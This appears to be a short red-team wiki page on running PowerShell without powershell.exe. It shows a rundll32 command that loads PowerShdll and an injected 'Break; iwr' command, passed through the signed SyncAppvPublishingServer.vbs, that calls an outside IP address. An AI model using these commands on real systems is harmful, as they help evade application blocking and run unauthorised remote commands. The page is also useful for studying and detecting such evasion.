Powershell Without Powershell.exe

Powershell.exe is just a process hosting the System.Management.Automation.dll which essentially is the actual Powershell as we know it.

If you run into a situation where powershell.exe is blocked and no strict application whitelisting is implemented, there are ways to execute powershell still.

PowerShdll

rundll32.exe PowerShdll.dll,main

Note that the same could be achieved with a compiled .exe binary from the same project, but keep in mind that .exe is more likely to run into whitelisting issues.

SyncAppvPublishingServer

Windows 10 comes with SyncAppvPublishingServer.exe and SyncAppvPublishingServer.vbs that can be abused with code injection to execute powershell commands from a Microsoft signed script:

SyncAppvPublishingServer.vbs "Break; iwr http://10.0.0.5:443"

References

GitHub - p3nt4/PowerShdll: Run PowerShell with rundll32. Bypass software restrictions.GitHub

https://safe-cyberdefense.com/malware-can-use-powershell-without-powershell-exe/safe-cyberdefense.com

PreviousApplication Whitelisting Bypass with WMIC and XSL NextPowershell Constrained Language Mode Bypass

Last updated 7 years ago

hashtagPowerShdll

hashtagSyncAppvPublishingServer

hashtagReferences

PowerShdll

SyncAppvPublishingServer

References